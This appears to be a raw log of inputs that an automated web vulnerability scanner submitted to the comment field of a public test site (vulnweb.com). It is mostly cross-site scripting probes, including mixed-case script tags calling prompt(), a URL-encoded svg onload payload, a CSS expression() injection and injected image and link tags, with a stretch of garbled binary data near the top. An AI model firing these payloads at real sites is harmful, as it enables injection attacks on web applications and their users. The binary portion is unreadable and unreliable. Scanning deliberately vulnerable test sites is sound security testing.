acu5498<s1﹥s2ʺs3ʹuca5498
acux6145��z1��z2a�bcxuca6145
acu136%6xuca136AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(987966)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(921292)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(990209)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(936291))}
add-comment=add-comment_JV4dG
add-comment=add-comment
add-comment=add-comment